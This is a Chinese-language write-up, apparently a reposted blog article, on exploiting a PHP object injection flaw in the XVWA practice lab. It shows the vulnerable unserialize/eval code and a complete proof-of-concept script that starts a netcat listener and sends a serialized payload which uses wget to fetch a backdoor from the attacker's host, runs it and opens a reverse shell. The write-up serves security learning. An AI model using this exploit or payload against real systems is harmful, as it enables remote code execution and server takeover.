PHP序列化/对象注入漏洞分析


Posted in PHP onApril 18, 2016

本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。

如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作。

漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 。它会被动检测PHP和Java序列化的存在。

分析
我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是,序列化对象是从参数“r”取来的:

$var1=unserialize($_REQUEST['r']);
然后再进行反序列化和eval:

eval($this->inject);
接着,执行:

echo "<br/>".$var1[0]." - ".$var1[1];
有了这些,如果我们绕过了参数r的PHP序列化对象,那么就可以获得代码执行漏洞了!

< ?php 
  error_reporting(E_ALL);
  class PHPObjectInjection{
    public $inject;
 
    function __construct(){
 
    }
 
    function __wakeup(){
      if(isset($this->inject)){
        eval($this->inject);
      }
    }
  }
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}
  if(isset($_REQUEST['r'])){ 
 
    $var1=unserialize($_REQUEST['r']);
    
 
    if(is_array($var1)){ 
      echo "
".$var1[0]." - ".$var1[1];
    }
  }else{
    echo "parameter is missing";
  }
? >

漏洞利用
为了利用这个漏洞,我们创建了一个简单的PHP脚本来自动生成PHP序列化payload,以及在目标远程主机上运行我们想要的命令。然后,我创建了一个通用的PHP反弹shell,下载地址如下:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
注意: 你需要把这个文件传到web服务器上,改动反弹shell脚本里面的本地ip和端口,以及下面的利用代码:

<?php 
/*
PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. 
Shouts to @jstnkndy @yappare for theassist!
NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured
*/
print"==============================================================================\r\n";
print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print"==============================================================================\r\n";
print "[+] Generating serializedpayload...[OK]\r\n";
print "[+] Launching reverselistener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp1234\'');
class PHPObjectInjection
{
  //CHANGE URL/FILENAME TO MATCH YOUR SETUP
 public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
 
$url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER
$url = $url . urlencode(serialize(newPHPObjectInjection));
print "[+] Sendingexploit...[OK]\r\n";
print "[+] Dropping down tointeractive shell...[OK]\r\n";
print"==============================================================================\r\n";
$response =file_get_contents("$url");
 
? >

Demo
现在咱们的利用脚本已经就绪,我们可以执行它来得到远程主机上的反弹shell,用来远程执行命令!

以上就是本文的全部内容,希望对大家学习php程序设计有所帮助。

PHP 相关文章推荐
用php实现让页面只能被百度gogole蜘蛛访问的方法
Dec 29 PHP
PHP UTF8中文字符截断函数代码
Sep 11 PHP
php 判断服务器操作系统的类型
Feb 17 PHP
PHP解析目录路径的3个函数总结
Nov 18 PHP
php+mysqli使用预处理技术进行数据库查询的方法
Jan 28 PHP
php使用gzip压缩传输js和css文件的方法
Jul 29 PHP
Yii2框架实现数据库常用操作总结
Feb 08 PHP
PHP7多线程搭建教程
Apr 21 PHP
Laravel框架生命周期与原理分析
Jun 12 PHP
使用Zookeeper分布式部署PHP应用程序
Mar 15 PHP
使用composer安装使用thinkphp6.0框架问题【视频教程】
Oct 01 PHP
laravel withCount 统计关联数量的方法
Oct 10 PHP
php实现三级级联下拉框
Apr 17 #PHP
PHP加密3DES报错 Call to undefined function: mcrypt_module_open() 如何解决
Apr 17 #PHP
orm获取关联表里的属性值
Apr 17 #PHP
ThinkPHP框架搭建及常见问题(XAMPP安装失败、Apache/MySQL启动失败)
Apr 15 #PHP
php基于jquery的ajax技术传递json数据简单实例
Apr 15 #PHP
PHP6连接SQLServer2005的三部曲
Apr 15 #PHP
php使用pear_smtp发送邮件
Apr 15 #PHP
You might like
memcached 和 mysql 主从环境下php开发代码详解
2010/05/16 PHP
Yii把CGridView文本框换成下拉框的方法
2014/12/03 PHP
FireFox中textNode分片的问题
2007/04/10 Javascript
Extjs学习笔记之五 一个小细节renderTo和applyTo的区别
2010/01/07 Javascript
在服务端(Page.Write)调用自定义的JS方法详解
2013/08/09 Javascript
jQuery实现div浮动层跟随页面滚动效果
2014/02/11 Javascript
js获取窗口相对于屏幕左边和上边的位置坐标
2014/05/15 Javascript
javascript常用的正则表达式实例
2014/05/15 Javascript
QQ空间顶部折页撕开效果示例代码
2014/06/15 Javascript
动态加载jQuery的方法
2015/06/16 Javascript
Node.js事件驱动
2015/06/18 Javascript
javascript针对不确定函数的执行方法
2015/12/16 Javascript
webpack+vue.js快速入门教程
2016/10/12 Javascript
jquery css实现邮箱自动补全
2016/11/14 Javascript
Javascript 实现放大镜效果实例详解
2016/12/03 Javascript
微信小程序实现图片预加载组件
2017/01/18 Javascript
利用jQuery实现滑动开关按钮效果(附demo源码下载)
2017/02/07 Javascript
BootStrapValidator初使用教程详解
2017/02/10 Javascript
angularjs ui-router中路由的二级嵌套
2017/03/10 Javascript
Vue组件化开发思考
2018/02/02 Javascript
Vant的安装和配合引入Vue.js项目里的方法步骤
2018/12/05 Javascript
python基础教程之面向对象的一些概念
2014/08/29 Python
python中的变量如何开辟内存
2018/06/26 Python
python与caffe改变通道顺序的方法
2018/08/04 Python
Python list与NumPy array 区分详解
2019/11/06 Python
wxPython窗体拆分布局基础组件
2019/11/19 Python
python已协程方式处理任务实现过程
2019/12/27 Python
解决keras模型保存h5文件提示无此目录问题
2020/07/01 Python
python3让print输出不换行的方法
2020/08/24 Python
python实现sm2和sm4国密(国家商用密码)算法的示例
2020/09/26 Python
校园活动策划书范文
2014/01/10 职场文书
九年级科学教学反思
2014/01/29 职场文书
介绍信样本
2015/01/31 职场文书
新手开公司创业注意事项有哪些?
2019/07/29 职场文书
python 批量压缩图片的脚本
2021/06/02 Python
解决MySQL报“too many connections“错误
2022/04/19 MySQL